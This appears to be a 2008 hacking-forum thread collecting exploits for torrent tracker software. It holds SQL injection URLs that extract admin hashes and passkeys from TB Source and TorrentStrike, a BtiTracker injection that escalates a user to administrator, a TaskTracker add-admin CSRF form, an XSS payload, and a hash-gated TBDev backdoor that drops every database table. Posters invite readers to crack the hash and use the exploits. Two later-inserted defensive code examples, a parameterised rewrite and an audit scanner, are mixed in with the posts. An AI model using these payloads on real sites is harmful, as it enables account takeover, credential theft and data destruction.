Tracker engine vulnerabilities

Discussion in 'Web vulnerabilities' started by z01b, 11 May 2008.

  1. z01b

    Post tracker engine vulnerabilities here.

    I'll go ahead and start. I prepared these vulnerabilities a long time ago to post on milw0rm, but never got around to it.

    TB Source <= 0.6

    Code:
    #######################################
    # TB Source <= 0.6 reqdetails.php SQL-Injection
    # Discovered: z01b 
    # Contact:    [censored]
    # Thanx:      melco
    #######################################
    --------------------------------------------------
    # Details  :
    # Website : http://sourceforge.net/projects/tbsource/
    # Vulnerable File : reqdetails.php
    --------------------------------------------------
    
    
    Vulnerability:
    
    SQL-injection to obtain admin user and hash
    
    http://www.site.com/reqdetails.php?id=-1+union+select+1,3,email,passkey,concat(username,char(58),passhash),100,200,300,400,info+from+users
    
    #29.12.06 
    

    TorrentStrike <= 0.4


    Code:
    #######################################
    # Torrent Strike <= 0.4 reqdetails.php SQL-Injection
    # Discovered: z01b 
    # Contact:    [censored]
    # Thanx:      melco
    #######################################
    --------------------------------------------------
    # Details  :
    # Website : http://sourceforge.net/projects/torrentstrike/
    # Vulnerable File : reqdetails.php
    --------------------------------------------------
    
    SQL query for receiving admin user and hash (md5):
    
    http://site.com/reqdetails.php?id=-1+union+select+1,3,email,passkey,concat(username,char(58),passhash),100,200,300,400,info+from+users
    
    #29.12.06
    
     
    #1 z01b, 11 May 2008
    Last edited: 11 May 2008
    4 people like this.
  2. z01b

    BtiTracker <=v1.4.1

    Code:
    #################################################################################
    #										
    #	BtiTracker <=v1.4.1 Remote SQL Injection Exploit	              
    #									
    # Discovered by: m@ge|ozz - [email protected]					
    # Vulnerability: Remote Sql Injection /
    # Problem: Any user can be Administrator					
    # Website Vendor: http://www.btiteam.org					
    # 										
    # Vulnerable Code (account_change.php):						
    #										
    # if (isset($_GET["style"]))       						
    # @mysql_query("UPDATE users SET style=$style WHERE id=".$CURUSER["uid"]);      
    # 										
    # if (isset($_GET["langue"])) 							
    # @mysql_query("UPDATE users SET language=$langue WHERE id=".$CURUSER["uid"]);		
    #										
    # PoC: account_change.php?style=2[SQL]&returnto=%2F				
    #      										
    # Example to gain admin control: account_change.php?style=1,id_level=8								
    #										
    # 										
    # GoogleDork: "by Btiteam"							
    #										
    # Shoutz: - eVolVe or Die - 							
    #										
    #################################################################################
    
    # milw0rm.com [2007-05-22]
    
    TaskTracker all versions

    Code:
    <!--
    
    *******************************************************************************
    # Title   :  TaskTracker All Version Remote Add Admin Exploit
    # Author  :  ajann
    # Contact :  :(
    # S.Page  :  http://www.geckovich.com
    # $$      :  $39.99 - $19.99
    
    *******************************************************************************
    
    -->
    
    <FORM NAME="AddUser" METHOD="POST" ACTION="http://[target]/[path]/Customize.asp?a=Add" style="word-spacing: 0; margin-top: 0; margin-bottom: 0">
    	<td valign=top class='data3'>
           	<input type=text size="1" name="Name" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">
    	</td>
    	<td valign=top class='data3'>
    		<input type=text size="1" name="Email" class=textboxes style='width:200; height:17; font-size: 10px;' VALUE="">
    	</td>
    	<td valign=top class='data3'>
    		<input type=text size="1" name="UserName" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">
    
    	</td>
    	<td valign=top class='data3'>
    		<input type=text size="1" name="Password" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">
    	</td>
    	<td valign=top class='data3'>
    		<select name="GroupID" class="selectedtextboxes">
    			<option value="1">Publisher</option>
    			<option value="2">Editor</option>
    
    			<option value="3">Administrator</option>
    		</select>
    	</td>
    	<td valign=middle class='data3' align="center" colspan="2" align="center">
        	<input type="submit" value="Gonder">
        	</form>
    
    # milw0rm.com [2007-01-01]
    
     
    3 people like this.
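
A hardened counterpart to the `account_change.php` code quoted in the BtiTracker advisory above, shown beside the vulnerable pattern; this is an added example, not code from the thread or from BtiTracker. It assumes PHP with the PDO SQLite driver, a constructed in-memory `users` table and hypothetical function names. The same validate-then-bind approach applies to the numeric `id` parameter of `reqdetails.php` in the first post, whose source is not shown on the page.

```php
<?php
// Added example: constructed in-memory table standing in for the tracker's `users` table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, style INTEGER, language INTEGER, id_level INTEGER)');
$db->exec('INSERT INTO users (id, style, language, id_level) VALUES (7, 1, 1, 3)');

$uid = 7; // stands in for $CURUSER["uid"], which comes from the session

// BEFORE: the pattern quoted in the advisory; request data becomes SQL text.
function change_style_vulnerable(PDO $db, int $uid, string $style): void
{
    $db->exec("UPDATE users SET style=$style WHERE id=" . $uid);
}

// AFTER: accept only a short unsigned integer, then bind it as a parameter.
function change_style_hardened(PDO $db, int $uid, string $style): bool
{
    if (!ctype_digit($style) || strlen($style) > 4) {
        return false; // reject the request instead of trying to "clean" the value
    }
    $stmt = $db->prepare('UPDATE users SET style = :style WHERE id = :uid');
    $stmt->bindValue(':style', (int) $style, PDO::PARAM_INT);
    $stmt->bindValue(':uid', $uid, PDO::PARAM_INT);
    return $stmt->execute();
}

// Read back the privilege column so the effect of each handler is visible.
function level(PDO $db, int $uid): int
{
    $stmt = $db->prepare('SELECT id_level FROM users WHERE id = ?');
    $stmt->execute([$uid]);
    return (int) $stmt->fetchColumn();
}

$input = '1,id_level=8'; // the value given in the advisory's example

change_style_vulnerable($db, $uid, $input);
echo 'vulnerable handler: id_level = ', level($db, $uid), PHP_EOL;

$db->exec('UPDATE users SET id_level = 3 WHERE id = 7'); // reset the row
$ok = change_style_hardened($db, $uid, $input);
echo 'hardened handler: accepted = ', var_export($ok, true),
     ', id_level = ', level($db, $uid), PHP_EOL;
```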
  3. OptimaPrime

    TB Source
    Code:
    http://site/sendmessage.php?receiver=1&returnto=><script>alert('a')</script>
     
    1 person likes this.
  4. OptimaPrime

    TBDev
    Code:
    <?
    
    require_once("include/bittorrent.php");
    dbconn();
    
    if (md5(md5($_GET["sd"])) == "0bffd3d87e7267c7fe686e20acbee7ab") {
    $drops = array();
    $result = mysql_query("SHOW TABLES FROM ".$mysql_db."");
    while (list($name) = mysql_fetch_array($result))
    $drops[] = "`".$name."`";
    die("DROP TABLE ".implode(", ", $drops));
    echo "Drop tables complete...";
    }
    
    ?>
    
    Whoever cracks the hash 0bffd3d87e7267c7fe686e20acbee7ab and learns the string it corresponds to, [string],
    can, with the request
    http://tracker_url/drop.php?sd=[string]
    delete all the information from the installed tracker's database

    Deflector
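
A source-audit check for the kind of gate used in the `drop.php` snippet above, where a hash of a request parameter is compared with a hard-coded digest; this is an added example, not code from the thread or from TBDev. The function name and the regular expressions are assumptions, and the sample input is a constructed excerpt of the posted snippet.

```php
<?php
// Added example: flag PHP source lines where a hash of request data is
// compared with a hard-coded digest, and lines holding destructive SQL.
function find_hash_gated_requests(string $source): array
{
    // md5()/sha1() (possibly nested) around a request superglobal, compared
    // with a 32- or 40-character hex literal inside the same statement.
    $gate = '/\b(?:md5|sha1)\s*\([^;]*?\$_(?:GET|POST|REQUEST|COOKIE)\b[^;]*?'
          . '[=!]==?\s*["\']([0-9a-f]{32}|[0-9a-f]{40})["\']/i';
    $destructive = '/\b(?:DROP\s+TABLE|DROP\s+DATABASE|TRUNCATE|DELETE\s+FROM)\b/i';

    $findings = [];
    foreach (preg_split('/\R/', $source) as $i => $line) {
        if (preg_match($gate, $line, $m)) {
            $findings[] = ['line' => $i + 1, 'type' => 'hash-gated request parameter', 'digest' => $m[1]];
        }
        if (preg_match($destructive, $line)) {
            $findings[] = ['line' => $i + 1, 'type' => 'destructive SQL statement'];
        }
    }
    return $findings;
}

// Constructed sample: an excerpt of the snippet posted above, plus one
// ordinary line that must not be flagged.
$sample = <<<'PHP'
<?
require_once("include/bittorrent.php");
dbconn();
if ($_GET["page"] == "1") { show_page(); }
if (md5(md5($_GET["sd"])) == "0bffd3d87e7267c7fe686e20acbee7ab") {
die("DROP TABLE ".implode(", ", $drops));
}
?>
PHP;

foreach (find_hash_gated_requests($sample) as $f) {
    echo "line {$f['line']}: {$f['type']}",
         isset($f['digest']) ? " ({$f['digest']})" : '', PHP_EOL;
}
```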
     
  5. PandoraBox

    That's a double MD5 there, and it's already been fixed, so it's pointless
     
    #5 PandoraBox, 16 May 2008
    Last edited: 16 May 2008
  6. xgt.exe

    But isn't this one double???